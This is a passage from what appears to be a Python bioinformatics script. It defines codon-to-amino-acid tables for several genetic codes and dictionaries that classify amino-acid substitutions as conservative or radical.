'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 
'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 
'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] # invertebrateMt start codons
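# aaSchemeDict1..7: pairwise amino-acid classifications, one dict per scheme;
# each maps an (aa1, aa2) pair to 'C' (conservative) or 'R' (radical).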
aaSchemeDict1 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"C",("A","Y"):"C",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"C",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"C",("N","Y"):"C",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"C",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"C",("C","Y"):"C",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"C",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"C",("G","Y"):"C",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"C",("I","Y"):"C",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"C",("L","Y"):"C",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"C",("M","Y"):"C",("M","V"):"C",("F","P"):"C",("F","S"):"C",("F","T"):"C",("F","W"):"C",("F","Y"):"C",("F","V"):"C",("P","S"):"C",("P","T"):"C",("P","W"):"C",("P","Y"):"C",("P","V"):"C",("S","T"):"C",("S","W"):"C",("S","Y"):"C",("S","V"):"C",("T","W"):"C",("T","Y"):"C",("T","V"):"C",("W","Y"):"C",("W","V"):"C",("Y","V"):"C",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):
"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"C",("Y","A"):"C",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"C",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"C",("Y","N"):"C",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"C",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"C",("Y","C"):"C",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"C",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"C",("Y","G"):"C",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"C",("Y","I"):"C",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"C",("Y","L"):"C",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"C",("Y","M"):"C",("V","M"):"C",("P","F"):"C",("S","F"):"C",("T","F"):"C",("W","F"):"C",("Y","F"):"C",("V","F"):"C",("S","P"):"C",("T","P"):"C",("W","P"):"C",("Y","P"):"C",("V","P"):"C",("T","S"):"C",("W","S"):"C",("Y","S"):"C",("V","S"):"C",("W","T"):"C",("Y","T"):"C",("V","T"):"C",("Y","W"):"C",("V","W"):"C",("V","Y"):"C",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict2 = {("R","H"):"C",("R","K"):"C",("R","D"):"C",("R","E"):"C",("R","A"):"R",("R","N"):"C",("R","C"):"C",("R","Q"):"C",("R","G"):"C",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"C",("R","T"):"C",("R","W"):"R",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"C",("H","E"):"C",("H","A"):"R",("H","N"):"C",("H","C"):"C",("H","Q"):"C",("H","G"):"C",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"C",("H","T"):"C",("H","W"):"R",("H","Y"):"C",("H","V"):"R",("K","D"):"C",("K","E"):"C",("K","A"):"R",("K","N"):"C",("K","C"):"C",("K","Q"):"C",("K","G"):"C",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"C",("K","T"):"C",("K","W"):"R",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"C",("D","Q"):"C",("D","G"):"C",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"C",("D","T"):"C",("D","W"):"R",("D","Y"):"C",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"C",("E","Q"):"C",("E","G"):"C",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"C",("E","T"):"C",("E","W"):"R",("E","Y"):"C",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"C",("E","R"):"C",("A","R"):"R",("N","R"):"C",("C","R"):"C",("Q","R"):"C",("G","R"):"C",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"C",("T","R"):"C",("W","R"):"R",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"C",("E","H"):"C",("A","H"):"R",("N","H"):"C",("C","H"):"C",("Q","H"):"C",("G","H"):"C",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"C",("T","H"):"C",("W","H"):"R",("Y","H"):"C",("V","H"):"R",("D","K"):"C",("E","K"):"C",("A","K"):"R",("N","K"):"C",("C","K"):"C",("Q","K"):"C",("G","K"):"C",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"C",("T","K"):"C",("W","K"):"R",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"C",("Q","D"):"C",("G","D"):"C",("I","D"):"R",("L","D"):"R",("M","D"):
"R",("F","D"):"R",("P","D"):"R",("S","D"):"C",("T","D"):"C",("W","D"):"R",("Y","D"):"C",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"C",("Q","E"):"C",("G","E"):"C",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"C",("T","E"):"C",("W","E"):"R",("Y","E"):"C",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict3 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"C",("D","C"):"R",("D","Q"):"C",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"C",("E","C"):"R",("E","Q"):"C",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"R",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"R",("N","T"):"R",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"R",("C","T"):"R",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"C",("F","T"):"C",("F","W"):"R",("F","Y"):"R